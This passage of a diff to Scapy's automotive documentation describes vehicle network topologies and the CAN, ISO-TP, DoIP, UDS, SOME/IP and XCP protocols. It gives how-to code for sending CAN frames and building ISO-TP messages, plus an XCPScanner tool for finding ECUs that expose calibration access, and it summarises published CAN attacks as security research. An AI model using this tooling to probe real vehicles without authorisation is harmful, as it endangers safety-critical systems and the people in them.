an attacker to affect all ECUs, even safety-critical ones, by compromising one single ECU. The overall security level of this network is given from the security level of the weakest participant. - socket.sr1(packet, timeout=1) +Central Gateway +--------------- -Send a message over a Vector CAN-Interface:: +.. _fig-cgw: - import can - load_layer("can") - conf.contribs['CANSocket'] = {'use-python-can' : True} - load_contrib('cansocket') - from can.interfaces.vector import VectorBus +.. figure:: ../graphics/automotive/ZGW-CAN-Bus-.png - socket = CANSocket(channel=VectorBus(0, bitrate=1000000)) - packet = CAN(identifier=0x123, data=b'01020304') + Network topology with central GW ECU - socket.send(packet) - rx_packet = socket.recv() +The central Gateway (GW) topology can be found in higher-priced older cars and medium-priced to lower-priced recent cars. A centralized GW ECU separates domain-specific sub-networks. This allows an OEM to encapsulate all ECUs with remote attack surfaces in one sub-network. ECUs with safety-critical functionalities are located in an individual CAN network. Next to CAN, FlexRay might also be used as a communication protocol inside a separate network domain. The security of a safety-critical network in this topology depends mainly on the central GW ECU’s security. This architecture increases the overall security level of a vehicle through domain separation. After an attacker successfully exploited an ECU through an arbitrary attack surface, a second exploitable vulnerability or a logical bug is necessary to compromise a different domain, a safety-critical network, inside a vehicle. This second exploit or logical bug is necessary to overcome the network separation of the central GW ECU. - socket.sr1(packet) +Central Gateway and Domain Controller +------------------------------------- +.. _fig-dc: +.. figure:: ../graphics/automotive/DC-ZGW-CAN-Bus-.png -Tutorials ---------- + Network topology with Automotive-Ethernet backbone and DC -Linux SocketCAN -^^^^^^^^^^^^^^^ +A new topology with central GW and Domain Controllers (DCs) can be found in the latest higher-priced vehicles. The increasing demand for bandwidth in modern vehicles with autonomous driving and driver assistant features led to this topology. An Automotive Ethernet network is used as a communication backbone for the entire vehicle. Individual domains, connected through a DC with the central GW, form the vehicle’s backbone. The individual DCs can control and regulate the data communication between a domain and the vehicle’s backbone. This topology achieves a very-high security level through a strong network separation with individual DCs, acting as gateway and firewall, to the vehicle’s backbone network. OEMs have the advantage of dynamic information routing next to this security improvement, an enabler for Feature on Demand (FoD) services. -This subsection summarizes some basics about Linux SocketCAN. An excellent overview -from Oliver Hartkopp can be found here: https://wiki.automotivelinux.org/_media/agl-distro/agl2017-socketcan-print.pdf +Automotive Communication Protocols +================================== -Virtual CAN Setup -^^^^^^^^^^^^^^^^^ +This section provides an overview of relevant communication protocols for security evaluations in automotive networks. In contrast to section "Physical Protocols", this section focuses on properties for data communication. -Linux SocketCAN supports virtual CAN interfaces. These interfaces are an easy way -to do some first steps on a CAN-Bus without the requirement of special hardware. -Besides that, virtual CAN interfaces are heavily used in Scapy unit test for automotive -related contributions. +CAN +--- -Virtual CAN sockets require a special Linux kernel module. The following shell command loads the required module:: +The CAN communication technology was invented in 1983 as a message-based robust vehicle bus communication system. The Robert Bosch GmbH designed multiple communication features into the CAN standard to achieve a robust and computation efficient protocol for controller area networks. Remarkable for the communication behavior of CAN is the internal state machine for transmission errors. This state machine implements a fail silent behavior to protect a safety-critical network from babbling idiot nodes. If a specific limit of reception errors (REC) or transmission errors (TEC) occurred, the CAN driver changes its state from error-active to error-passive and finally to bus-off. - sudo modprobe vcan +.. _fig-can-bus-states: -In order to use a virtual CAN interface some additional commands for setup are required. -This snippet chooses the name ``vcan0`` for the virtual CAN interface. Any name can be chosen here:: +.. figure:: ../graphics/automotive/can-bus-states.png - sudo ip link add name vcan0 type vcan - sudo ip link set dev vcan0 up + CAN bus states on transmission errors. Receive Error Counter (REC), Transmit Error Counter (TEC) -The same commands can be executed from Scapy like this:: +In recent years, this protocol specification was abused for Denial of Service (DoS) attacks and information gathering attacks on the CAN network of a vehicle. Cho et al. demonstrated a DoS attack against CAN networks by abusing the bus-off state of ECUs [1]_. Injections of communication errors in CAN frames of one specific node caused a high transmission error count in the node under attack, forcing the attacked node to enter the bus-off state. In 2019 Kulandaivel et al. combined this attack with statistical analysis to achieve a fast and inexpensive network mapping in vehicular networks [2]_. They combined statistical analysis of the CAN network traffic before and after the bus-off attack was applied to a node. All missing CAN frames in the network traffic after an ECU was attacked could now be mapped to the ECU under attack, helping researchers identify the origin ECU of a CAN frame. Ken Tindell published a comprehensive summary of low level attacks on CANs in 2019 [3]_. - from scapy.layers.can import * - import os +.. _fig-can-full-frame: - bashCommand = "/bin/bash -c 'sudo modprobe vcan; sudo ip link add name vcan0 type vcan; sudo ip link set dev vcan0 up'" - os.system(bashCommand) +.. figure:: ../graphics/automotive/CAN-full-frame.jpg -If it's required, a CAN interface can be set into a ``listen-only`` or ``loopback`` mode with ``ip link set`` commands:: + Complete CAN data frame structure [9]_ - ip link set vcan0 type can help # shows additional information +The above figure shows a CAN frame and its fields as it is transferred over the network. For information exchange, only the fields arbitration, control, and data are relevant. These are the only fields to which a usual application software has access. All other fields are evaluated on a hardware-layer and, in most cases, are not forwarded to an application. The data field has a variable length and can hold up to eight bytes. The length of the data field is specified by the data length code inside the control field. Important variations of this example are CAN-frames with extended arbitration fields and the Controller Area Network Flexible Data-Rate (CAN FD) protocol. On Linux, every received CAN frame is passed to SocketCAN. SocketCAN allows the CAN handling via network sockets of the operating system. SocketCAN was created by Oliver Hartkopp and added to the Linux Kernel version 2.6.25 [4]_. Figure 2.7 shows the frame structure, how CAN frames are encoded if a user-land application receives data from a CAN socket. +.. _fig-can-socket-frame: -Linux can-utils -^^^^^^^^^^^^^^^ +.. figure:: ../graphics/automotive/can-frame-socket-can.png -As part of Linux SocketCAN, some very useful commandline tools are provided from Oliver Hartkopp: https://github.com/linux-can/can-utils + CAN frame defined by SocketCAN -The following example shows basic functions of Linux can-utils. These utilities are very handy for -quick checks, dumping, sending or logging of CAN messages from the command line. +The comparison of above figures clearly shows the loss of information during the CAN frame processing from a physical layer driver. Almost every CAN driver acts in the same way, whether an application code runs on a microcontroller or a Linux kernel. This also means that a standard application does not have access to the Cyclic Redundancy Check (CRC) field, the acknowledgment bit, or the end-of-frame field. + +Through the CAN communication in a vehicle or a separated domain, ECUs exchange sensor-data and control inputs; this data is mainly not secured and can be modified by assailants. Attackers can easily spoof sensor values on a CAN bus to trigger malicious reactions of other ECUs. Miller and Valasek described this spoofing attack during their studies on automotive networks [5]_. To prevent attacks on safety-critical data transferred over CAN, Automotive Open System Architecture (AUTOSAR) released a secure onboard communication specification [6]_. + +ISO-TP (ISO 15765-2) +-------------------- + +The CAN protocol supports only eight bytes of data. Use-cases like diagnostic operations or ECU programming require much higher payloads than the CAN protocol supports. For these purposes, the automotive industry standardized the Transport Layer (ISO-TP) (ISO 15765-2) protocol [7]_. ISO-TP is a transportation layer protocol on top of CAN. Payloads with up to 4095 bytes can be transferred between ISO-TP endpoints fragmented in CAN frames. The ISO-TP protocol handling requires four special frame types. + +.. _fig-isotp-flow: + +.. figure:: ../graphics/automotive/isotp-flow.png + + ISO-TP fragmented communication + +The different types of ISO-TP frames are shown in the following figure. The payload of a CAN frame gets replaced by one of the four ISO-TP frames. The individual ISO-TP frames have different purposes. A single frame can transfer between 1 and 7 bytes of ISO-TP message data. The len field of a Single Frame or a First Frame indicates the ISO-TP message length. Every message with more than 7 bytes of payload data must be fragmented into a First Frame, followed by multiple Consecutive Frames. This communication is illustrated in the above figure. After the First Frame is sent from a sender, the receiver has to communicate its reception capabilities through a Flow Control Frame to the sender. Only after this Flow Control Frame is received, the sender is allowed to communicate the Consecutive Frames according to the receiver’s capabilities. + +.. _fig-isotp-frames: + +.. figure:: ../graphics/automotive/isotp-frames.png + + ISO-TP frame types + +ISO-TP acts as a transport protocol with the support of directed communication through addressing mechanisms. In vehicles, ISO-TP is mainly used as a transport protocol for diagnostic communication. In rare cases, ISO-TP is also used to exchange larger data between ECUs of a vehicle. Security measures have to be applied to the application layer protocol transported through ISO-TP since ISO-TP has no capabilities to secure its transported data. + +DoIP +---- + +Diagnostic over IP (DoIP) was first implemented on automotive networks with a centralized gateway topology. A centralized GW functions as a DoIP endpoint that routes diagnostic messages to the desired network, allowing manufacturers to program or diagnose multiple ECUs in parallel. Since the Internet Protocol (IP) communication between a repair-shop tester and the GW is many times faster than the communication between the GW ECU and a target ECU connected over CAN, the remaining bandwidth of the IP communication can be used to start further DoIP connections to other ECUs in different CAN domains. DoIP is specified as part of AUTOSAR and in ISO 13400-2. Similar to ISO-TP, DoIP does not specify special security measures. The responsibility regarding secured communication is delegated to the application layer protocol. + +Diagnostic Protocols +-------------------- + +Two examples of diagnostic protocols are General Motor Local Area Network (GMLAN) and Unified Diagnostic Service (UDS) (ISO 14229-2). The General Motors Cooperation uses GMLAN. German OEMs mainly use UDS. Both protocols are very similar from a specification point of view, and both protocols use either ISO-TP or DoIP messages for a directed communication with a target ECU. Since different OEMs use UDS, every manufacturer adds its custom additions to the standard. Also, every manufacturer uses individual ISO-TP addressing for the directed communication with an ECU. GMLAN includes more precise definitions about ECU addressing and an ECUs internal behavior compared to UDS. + +UDS and GMLAN follow a tree-like message structure, where the first byte identifies the service. Every service is answered by a response. Two types of responses are defined in the standard. Negative responses are indicated through the service 0x7F. Positive responses are identified by the request service identifier incremented with 0x40. + +.. _fig-diag-stack: + +.. figure:: ../graphics/automotive/diag-stack.png + + Automotive Diagnostic Protocol Stack + +A clear separation between the transport and the application layer allows creating application layer tools for both network stacks. The figure above provides an overview of relevant protocols and the corresponding layers. UDS defines a clean separation between application and transport layer. On CAN based networks, ISO-TP is used for this purpose. The CAN protocol can be treated as the network access protocol. This allows to replace ISO-TP and CAN with DoIP or HSFZ and Ethernet. The GMLAN protocol combines transport and application layer specifications very similar to ISO-TP and UDS. Because of that similarity, identical application layer-specific scan techniques can be applied. To overcome the bandwidth limitations of CAN, the latest vehicle architectures use an Ethernet-based diagnostic protocol (DoIP, HSFZ) to communicate with a central gateway ECU. The central gateway ECU routes application layer packets from an Ethernet-based network to a CAN based vehicle internal network. In general, the diagnostic functions of all ECUs in a vehicle can be accessed from the OBD connector over UDSonCAN or UDSonIP. + +SOME/IP +------- + +Scalable service-Oriented MiddlewarE over IP (SOME/IP) defines a new philosophy of data communication in automotive networks. SOME/IP is used to exchange data between network domain controllers in the latest vehicle networks. SOME/IP supports subscription and notification mechanisms, allowing domain controllers to dynamically subscribe to data provided by another domain controller dependent on the vehicle’s state. SOME/IP transports data between domain controllers and the gateway that a vehicle needs during its regular operation. The use-cases of SOME/IP are similar to the use-cases of CAN communication. The main purpose is the information exchange of sensor and actuator data between ECUs. This usage emphasizes SOME/IP communication as a rewarding target for cyber-attacks. + +CCP/XCP +------- + +Universal Measurement and Calibration Protocol (XCP), the CAN Calibration Protocol (CCP) successor, is a calibration protocol for automotive systems, standardized by ASAM e.V. in 2003. The primary usage of XCP is during the testing and calibration phase of ECU or vehicle development. CCP is designed for use on CAN. No message in CCP exceeds the 8-byte limitation of CAN. To overcome this restriction, XCP was designed to aim for compatibility with a wide range of transport protocols. XCP can be used on top of CAN, CAN FD, Serial Peripheral Interface (SPI), Ethernet, Universal Serial Bus (USB), and FlexRay. The features of CCP and XCP are very similar; however, XCP has a larger functional scope and optimizations for data efficiency. + +Both protocols have a session-based communication procedure and support authentication through seed and key mechanisms between a master and multiple slave nodes. A master node is typically an engineering Personal Computer (PC). In vehicles, slave nodes are ECUs for configuration. XCP also supports simulation. A vehicle engineer can debug a MATLAB Simulink model through XCP. In this case, the simulated model acts as the XCP slave node. CCP and XCP can read and write to the memory of an ECU. Another main feature is data acquisition. Both protocols support a procedure that allows an engineer to configure a so-called data acquisition list with memory addresses of interest. All memory specified in such a list will be read periodically and be broadcast in a CCP or XCP Data Acquisition (DAQ) packet on the chosen communication channel. The following figure gives an overview of all supported communication and packet types in XCP. In the Command Transfer Object (CTO) area, all communication follows a request and response procedure always initiated by the XCP master. A Command Packet (CMD) can receive a Command Response Packet (RES), an Error (ERR) packet, an Event Packet (EV), or a Service Request Packet (SERV) as a response. After the configuration of a slave through CTO CMDs, a slave can listen for Stimulation (STIM) packets and periodically send configured DAQ packets. The resources section in the following figure indicates the possible attack surfaces of this protocol (Programming (PGM), Calibration (CAL), DAQ, STIM) which an attacker could abuse. It is crucial for a vehicle’s security and safety that such protocols, which have their use only during calibration and development of a vehicle, are disabled or removed before a vehicle is shipped to a customer. + +.. _fig-xcp-reference: + +.. figure:: ../graphics/automotive/XCP_ReferenceBook.png + + XCP communication model between XCP Master and XCP Slave. This model shows the communication direction for CTO/Data Transfer Object (DTO) packages [8]_. + +**References** + +.. [1] Kyong-Tak Cho and Kang G. Shin. Error handling of in-vehicle networks makes them vulnerable. In Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security, CCS ’16, page 1044–1055, New York, NY, USA, 2016. Association for Computing Machinery. + +.. [2] Sekar Kulandaivel, Tushar Goyal, Arnav Kumar Agrawal, and Vyas Sekar. Canvas: Fast and inexpensive automotive network mapping. In 28th USENIX Security Symposium (USENIX Security 19), pages 389–405, Santa Clara, CA, August 2019. USENIX Association. + +.. [3] Ken Tindell. CAN Bus Security - Attacks on CAN bus and their mitigations, 2019. https://canislabs.com/wp-content/uploads/2020/12/2020-02-14-White-Paper-CAN-Security.pdf + +.. [4] Oliver Hartkopp. Readme file for the Controller Area Network Protocol Family (aka SocketCAN), 2020 (accessed January 29, 2020). https://www.kernel.org/doc/Documentation/networking/can.txt + +.. [5] Dr. Charlie Miller and Chris Valasek. Adventures in Automotive Networks and Control Units. DEF CON 21 Hacking Conference. Las Vegas, NV: DEF CON, August 2013. http://illmatics.com/car_hacking.pdf (accessed 2020-05-27) + +.. [6] AUTOSAR. Specification of Secure Onboard Communication, 2020 (accessed January 31, 2020). https://www.autosar.org/fileadmin/user_upload/standards/classic/4-3/AUTOSAR_SWS_SecureOnboardCommunication.pdf + +.. [7] ISO Central Secretary. Road vehicles – Diagnostic communication over Controller Area Network (DoCAN) – Part 2: Transport protocol and network layer services. Standard ISO 15765-2:2016, International Organization for Standardization, Geneva, CH, 2016. + +.. [8] Vector Informatik GmbH. XCP – The Standard Protocol for ECU Development. Vector Informatik GmbH, 2020 (accessed January 30, 2020). https://assets.vector.com/cms/content/application-areas/ecu-calibration/xcp/XCP_ReferenceBook_V3.0_EN.pdf + +.. [9] Pico Technology Ltd. Complete CAN data frame structure, 2020 (accessed February 14, 2020). https://www.picotech.com/images/uploads/library/topics/_med/CAN-full-frame.jpg + +.. [10] Nils Weiss. Security Testing in Safety-Critical Networks. PhD Study Report. http://www.kiv.zcu.cz/site/documents/verejne/vyzkum/publikace/technicke-zpravy/2020/Rigo_Weiss_2020_2.pdf + + +****** +Layers +****** + +.. note:: **ATTENTION**: Animations below might be outdated. + +CAN +=== + +How-To +------ + +Send and receive a message over Linux SocketCAN:: + + load_layer("can") + load_contrib('cansocket') + + socket = CANSocket(channel='can0') + packet = CAN(identifier=0x123, data=b'01020304') + + socket.send(packet) + rx_packet = socket.recv() + + socket.sr1(packet, timeout=1) + +Send and receive a message over a Vector CAN-Interface:: + + load_layer("can") + conf.contribs['CANSocket'] = {'use-python-can' : True} + load_contrib('cansocket') + + socket = CANSocket(bustype='vector', channel=0, bitrate=1000000) + packet = CAN(identifier=0x123, data=b'01020304') + + socket.send(packet) + rx_packet = socket.recv() + + socket.sr1(packet) -.. image:: ../graphics/animations/animation-cansend.svg CAN Frame -^^^^^^^^^ +--------- Basic information about CAN can be found here: https://en.wikipedia.org/wiki/CAN_bus -The following examples assume that CAN layer in your Scapy session is loaded. If it isn't, -the CAN layer can be loaded with this command in your Scapy session:: +The following examples assume that CAN layer in your Scapy session is loaded. +If it isn't, the CAN layer can be loaded with this command in your Scapy session:: >>> load_layer("can") @@ -166,8 +300,9 @@ Creation of an extended CAN frame:: .. image:: ../graphics/animations/animation-scapy-canframe.svg + CAN Frame in- and export -^^^^^^^^^^^^^^^^^^^^^^^^ +------------------------ CAN Frames can be written to and read from ``pcap`` files:: @@ -186,9 +321,127 @@ This allows you to use ``sniff`` and other functions from Scapy:: .. image:: ../graphics/animations/animation-scapy-rdcandump.svg -Scapy CANSocket + +DBC File Format and CAN Signals +------------------------------- + +In order to support the DBC file format, ``SignalFields`` and the ``SignalPacket`` +classes were added to Scapy. ``SignalFields`` should only be used inside a ``SignalPacket``. +Multiplexer fields (MUX) can be created through ``ConditionalFields``. The following +example demonstrates the usage:: + + DBC Example: + + BO_ 4 muxTestFrame: 7 TEST_ECU + SG_ myMuxer M : 53|3@1+ (1,0) [0|0] "" CCL_TEST + SG_ muxSig4 m0 : 25|7@1- (1,0) [0|0] "" CCL_TEST + SG_ muxSig3 m0 : 16|9@1+ (1,0) [0|0] "" CCL_TEST + SG_ muxSig2 m0 : 15|8@0- (1,0) [0|0] "" CCL_TEST + SG_ muxSig1 m0 : 0|8@1- (1,0) [0|0] "" CCL_TEST + SG_ muxSig5 m1 : 22|7@1- (0.01,0) [0|0] "" CCL_TEST + SG_ muxSig6 m1 : 32|9@1+ (2,10) [0|0] "mV" CCL_TEST + SG_ muxSig7 m1 : 2|8@0- (0.5,0) [0|0] "" CCL_TEST + SG_ muxSig8 m1 : 0|6@1- (10,0) [0|0] "" CCL_TEST + SG_ muxSig9 : 40|8@1- (100,-5) [0|0] "V" CCL_TEST + + BO_ 3 testFrameFloat: 8 TEST_ECU + SG_ floatSignal2 : 32|32@1- (1,0) [0|0] "" CCL_TEST + SG_ floatSignal1 : 7|32@0- (1,0) [0|0] "" CCL_TEST + +Scapy implementation of this DBC description:: + + class muxTestFrame(SignalPacket): + fields_desc = [ + LEUnsignedSignalField("myMuxer", default=0, start=53, size=3), + ConditionalField(LESignedSignalField("muxSig4", default=0, start=25, size=7), lambda p: p.myMuxer == 0), + ConditionalField(LEUnsignedSignalField("muxSig3", default=0, start=16, size=9), lambda p: p.myMuxer == 0), + ConditionalField(BESignedSignalField("muxSig2", default=0, start=15, size=8), lambda p: p.myMuxer == 0), + ConditionalField(LESignedSignalField("muxSig1", default=0, start=0, size=8), lambda p: p.myMuxer == 0), + ConditionalField(LESignedSignalField("muxSig5", default=0, start=22, size=7, scaling=0.01), lambda p: p.myMuxer == 1), + ConditionalField(LEUnsignedSignalField("muxSig6", default=0, start=32, size=9, scaling=2, offset=10, unit="mV"), lambda p: p.myMuxer == 1), + ConditionalField(BESignedSignalField("muxSig7", default=0, start=2, size=8, scaling=0.5), lambda p: p.myMuxer == 1), + ConditionalField(LESignedSignalField("muxSig8", default=0, start=3, size=3, scaling=10), lambda p: p.myMuxer == 1), + LESignedSignalField("muxSig9", default=0, start=41, size=7, scaling=100, offset=-5, unit="V"), + ] + + class testFrameFloat(SignalPacket): + fields_desc = [ + LEFloatSignalField("floatSignal2", default=0, start=32), + BEFloatSignalField("floatSignal1", default=0, start=7) + ] + + bind_layers(SignalHeader, muxTestFrame, identifier=0x123) + bind_layers(SignalHeader, testFrameFloat, identifier=0x321) + + dbc_sock = CANSocket("can0", basecls=SignalHeader) + + pkt = SignalHeader()/testFrameFloat(floatSignal2=3.4) + + dbc_sock.send(pkt) + +This example uses the class ``SignalHeader`` as header. The payload is specified by individual ``SignalPackets``. +``bind_layers`` combines the header with the payload dependent on the CAN identifier. +If you want to directly receive ``SignalPackets`` from your ``CANSocket``, provide the parameter ``basecls`` to +the ``init`` function of your ``CANSocket``. + +Canmatrix supports the creation of Scapy files from DBC or AUTOSAR XML files https://github.com/ebroecker/canmatrix + + +CANSockets +========== + +Linux SocketCAN +--------------- + +This subsection summarizes some basics about Linux SocketCAN. An excellent overview +from Oliver Hartkopp can be found here: https://wiki.automotivelinux.org/_media/agl-distro/agl2017-socketcan-print.pdf + +Virtual CAN Setup +^^^^^^^^^^^^^^^^^ + +Linux SocketCAN supports virtual CAN interfaces. These interfaces are an easy way +to do some first steps on a CAN-Bus without the requirement of special hardware. +Besides that, virtual CAN interfaces are heavily used in Scapy unit tests for +automotive-related contributions. + +Virtual CAN sockets require a special Linux kernel module. The following shell command loads the required module:: + + sudo modprobe vcan + +In order to use a virtual CAN interface some additional commands for setup are required. +This snippet chooses the name ``vcan0`` for the virtual CAN interface. Any name can be chosen here:: + + sudo ip link add name vcan0 type vcan + sudo ip link set dev vcan0 up + +The same commands can be executed from Scapy like this:: + + from scapy.layers.can import * + import os + + bashCommand = "/bin/bash -c 'sudo modprobe vcan; sudo ip link add name vcan0 type vcan; sudo ip link set dev vcan0 up'" + os.system(bashCommand) + +If it's required, a CAN interface can be set into a ``listen-only`` or ``loopback`` mode with ``ip link set`` commands:: + + ip link set vcan0 type can help # shows additional information + + +Linux can-utils ^^^^^^^^^^^^^^^ +As part of Linux SocketCAN, some very useful command line tools are provided from +Oliver Hartkopp: https://github.com/linux-can/can-utils + +The following example shows the basic functions of Linux can-utils. These utilities +are very handy for quick checks, dumping, sending, or logging of CAN messages +from the command line. + +.. image:: ../graphics/animations/animation-cansend.svg + +Scapy CANSocket +--------------- + In Scapy, two kind of CANSockets are implemented. One implementation is called **Native CANSocket**, the other implementation is called **Python-can CANSocket**. @@ -338,71 +591,6 @@ Close the sockets:: .. image:: ../graphics/animations/animation-scapy-cansockets-mitm.svg .. image:: ../graphics/animations/animation-scapy-cansockets-mitm2.svg -DBC File Format and CAN Signals -^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ - -In order to support the DBC file format, ``SignalFields`` and the ``SignalPacket`` -classes were added to Scapy. ``SignalFields`` should only be used inside a ``SignalPacket``. -Multiplexer fields (MUX) can be created through ``ConditionalFields``. The following -example demonstrates the usage:: - - DBC Example: - - BO_ 4 muxTestFrame: 7 TEST_ECU - SG_ myMuxer M : 53|3@1+ (1,0) [0|0] "" CCL_TEST - SG_ muxSig4 m0 : 25|7@1- (1,0) [0|0] "" CCL_TEST - SG_ muxSig3 m0 : 16|9@1+ (1,0) [0|0] "" CCL_TEST - SG_ muxSig2 m0 : 15|8@0- (1,0) [0|0] "" CCL_TEST - SG_ muxSig1 m0 : 0|8@1- (1,0) [0|0] "" CCL_TEST - SG_ muxSig5 m1 : 22|7@1- (0.01,0) [0|0] "" CCL_TEST - SG_ muxSig6 m1 : 32|9@1+ (2,10) [0|0] "mV" CCL_TEST - SG_ muxSig7 m1 : 2|8@0- (0.5,0) [0|0] "" CCL_TEST - SG_ muxSig8 m1 : 0|6@1- (10,0) [0|0] "" CCL_TEST - SG_ muxSig9 : 40|8@1- (100,-5) [0|0] "V" CCL_TEST - - BO_ 3 testFrameFloat: 8 TEST_ECU - SG_ floatSignal2 : 32|32@1- (1,0) [0|0] "" CCL_TEST - SG_ floatSignal1 : 7|32@0- (1,0) [0|0] "" CCL_TEST - -Scapy implementation of this DBC description:: - - class muxTestFrame(SignalPacket): - fields_desc = [ - LEUnsignedSignalField("myMuxer", default=0, start=53, size=3), - ConditionalField(LESignedSignalField("muxSig4", default=0, start=25, size=7), lambda p: p.myMuxer == 0), - ConditionalField(LEUnsignedSignalField("muxSig3", default=0, start=16, size=9), lambda p: p.myMuxer == 0), - ConditionalField(BESignedSignalField("muxSig2", default=0, start=15, size=8), lambda p: p.myMuxer == 0), - ConditionalField(LESignedSignalField("muxSig1", default=0, start=0, size=8), lambda p: p.myMuxer == 0), - ConditionalField(LESignedSignalField("muxSig5", default=0, start=22, size=7, scaling=0.01), lambda p: p.myMuxer == 1), - ConditionalField(LEUnsignedSignalField("muxSig6", default=0, start=32, size=9, scaling=2, offset=10, unit="mV"), lambda p: p.myMuxer == 1), - ConditionalField(BESignedSignalField("muxSig7", default=0, start=2, size=8, scaling=0.5), lambda p: p.myMuxer == 1), - ConditionalField(LESignedSignalField("muxSig8", default=0, start=3, size=3, scaling=10), lambda p: p.myMuxer == 1), - LESignedSignalField("muxSig9", default=0, start=41, size=7, scaling=100, offset=-5, unit="V"), - ] - - class testFrameFloat(SignalPacket): - fields_desc = [ - LEFloatSignalField("floatSignal2", default=0, start=32), - BEFloatSignalField("floatSignal1", default=0, start=7) - ] - - bind_layers(SignalHeader, muxTestFrame, identifier=0x123) - bind_layers(SignalHeader, testFrameFloat, identifier=0x321) - - dbc_sock = CANSocket("can0", basecls=SignalHeader) - - pkt = SignalHeader()/testFrameFloat(floatSignal2=3.4) - - dbc_sock.send(pkt) - -This example uses the class ``SignalHeader`` as header. The payload is specified by individual ``SignalPackets``. -``bind_layers`` combines the header with the payload dependent on the CAN identifier. -If you want to directly receive ``SignalPackets`` from your ``CANSocket``, provide the parameter ``basecls`` to -the ``init`` function of your ``CANSocket``. - -Canmatrix supports the creation of Scapy files from DBC or AUTOSAR XML files https://github.com/ebroecker/canmatrix - - CAN Calibration Protocol (CCP) ============================== @@ -479,41 +667,130 @@ If we are interested in the response of an Ecu, we need to set the basecls param CANSocket to XCPonCAN and we need to use sr1: Sending a CTO message:: - sock = CANSocket(bustype='socketcan', channel='vcan0', basecls=XCPonCAN) - dto = sock.sr1(pkt) + sock = CANSocket(bustype='socketcan', channel='vcan0', basecls=XCPonCAN) + dto = sock.sr1(pkt) + +Since sr1 calls the answers function, our payload of the XCP-response objects gets interpreted with the +command of our CTO object. Otherwise it could not be interpreted. +The first message should always be the "CONNECT" message, the response of the Ecu determines how the messages are read. E.g.: byte order. +Otherwise, one must set the address granularity, and max size of the DTOs and CTOs per hand in the contrib config:: + + conf.contribs['XCP']['Address_Granularity_Byte'] = 1 # Can be 1, 2 or 4 + conf.contribs['XCP']['MAX_CTO'] = 8 + conf.contribs['XCP']['MAX_DTO'] = 8 + +If you do not want this to be set after receiving the message you can also disable that feature:: + + conf.contribs['XCP']['allow_byte_order_change'] = False + conf.contribs['XCP']['allow_ag_change'] = False + conf.contribs['XCP']['allow_cto_and_dto_change'] = False + +To send a pkt over TCP or UDP another header must be used. +TCP:: + + prt1, prt2 = 12345, 54321 + XCPOnTCP(sport=prt1, dport=prt2) / CTORequest() / Connect() + +UDP:: + + XCPOnUDP(sport=prt1, dport=prt2) / CTORequest() / Connect() + + +XCPScanner +--------------- + +The XCPScanner is a utility to find the CAN identifiers of ECUs that support XCP. + +Commandline usage example:: + + python -m scapy.tools.automotive.xcpscanner -h + Finds XCP slaves using the "GetSlaveId"-message(Broadcast) or the "Connect"-message. + + positional arguments: + channel Linux SocketCAN interface name, e.g.: vcan0 + + optional arguments: + -h, --help show this help message and exit + --start START, -s START + Start identifier CAN (in hex). + The scan will test ids between --start and --end (inclusive) + Default: 0x00 + --end END, -e END End identifier CAN (in hex). + The scan will test ids between --start and --end (inclusive) + Default: 0x7ff + --sniff_time', '-t' Duration in milliseconds a sniff is waiting for a response. + Default: 100 + --broadcast, -b Use Broadcast-message GetSlaveId instead of default "Connect" + (GetSlaveId is an optional Message that is not always implemented) + --verbose VERBOSE, -v + Display information during scan + + Examples: + python3.6 -m scapy.tools.automotive.xcpscanner can0 + python3.6 -m scapy.tools.automotive.xcpscanner can0 -b 500 + python3.6 -m scapy.tools.automotive.xcpscanner can0 -s 50 -e 100 + python3.6 -m scapy.tools.automotive.xcpscanner can0 -b 500 -v + + +Interactive shell usage example:: + >>> conf.contribs['CANSocket'] = {'use-python-can': False} + >>> load_layer("can") + >>> load_contrib("automotive.xcp.xcp") + >>> sock = CANSocket("vcan0") + >>> sock.basecls = XCPOnCAN + >>> scanner = XCPOnCANScanner(sock) + >>> result = scanner.start_scan() + +The result includes the slave_id (the identifier of the Ecu that receives XCP messages), +and the response_id (the identifier that the Ecu will send XCP messages to). + +ISOTP +===== + +ISOTP message +------------- + +Creating an ISOTP message:: + + load_contrib('isotp') + ISOTP(src=0x241, dst=0x641, data=b"\x3eabc") + +Creating an ISOTP message with extended addressing:: + + ISOTP(src=0x241, dst=0x641, exdst=0x41, data=b"\x3eabc") -Since sr1 calls the answers function, our payload of the XCP-response objects gets interpreted with the -command of our CTO object. Otherwise it could not be interpreted. -The first message should always be the "CONNECT" message, the response of the Ecu determines how the messages are read. E.g.: byte order. -Otherwise, one must set the address granularity, and max size of the DTOs and CTOs per hand in the contrib config:: +Creating an ISOTP message with extended addressing:: - conf.contribs['XCP']['Address_Granularity_Byte'] = 1 # Can be 1, 2 or 4 - conf.contribs['XCP']['MAX_CTO'] = 8 - conf.contribs['XCP']['MAX_DTO'] = 8 + ISOTP(src=0x241, dst=0x641, exdst=0x41, exsrc=0x41, data=b"\x3eabc") -If you do not want this to be set after receiving the message you can also disable that feature:: +Create CAN-frames from an ISOTP message:: - conf.contribs['XCP']['allow_byte_order_change'] = False - conf.contribs['XCP']['allow_ag_change'] = False - conf.contribs['XCP']['allow_cto_and_dto_change'] = False + ISOTP(src=0x241, dst=0x641, exdst=0x41, exsrc=0x55, data=b"\x3eabc" * 10).fragment() -To send a pkt over TCP or UDP another header must be used. -TCP:: +Send ISOTP message over ISOTP socket:: - prt1, prt2 = 12345, 54321 - XCPOnTCP(sport=prt1, dport=prt2) / CTORequest() / Connect() + isoTpSocket = ISOTPSocket('vcan0', sid=0x241, did=0x641) + isoTpMessage = ISOTP('Message') + isoTpSocket.send(isoTpMessage) -UDP:: +Sniff ISOTP message:: - XCPOnUDP(sport=prt1, dport=prt2) / CTORequest() / Connect() + isoTpSocket = ISOTPSocket('vcan0', sid=0x641, did=0x241) + packets = isoTpSocket.sniff(timeout=0.5) +ISOTP Sockets +------------- +Scapy provides two kinds of ISOTP-Sockets. One implementation, the ``ISOTPNativeSocket`` +is using the Linux kernel module from Hartkopp. The other implementation, the ``ISOTPSoftSocket`` +is completely implemented in Python. This implementation can be used on Linux, +Windows, and OSX. -ISOTP -===== +An ``ISOTPSocket`` will not respect ``src, dst, exdst, exsrc`` of an ``ISOTP`` +message object. System compatibilities ----------------------- +^^^^^^^^^^^^^^^^^^^^^^ Dependent on your setup, different implementations have to be used. @@ -535,43 +812,58 @@ The decision is made dependent on the configuration ``conf.contribs['ISOTP'] = { This will allow you to write platform independent code. Apply this configuration before loading the ISOTP layer with ``load_contrib('isotp')``. -Another remark in respect to ISOTPSocket compatibility. Always use with for socket creation. Example:: +Another remark in respect to ISOTPSocket 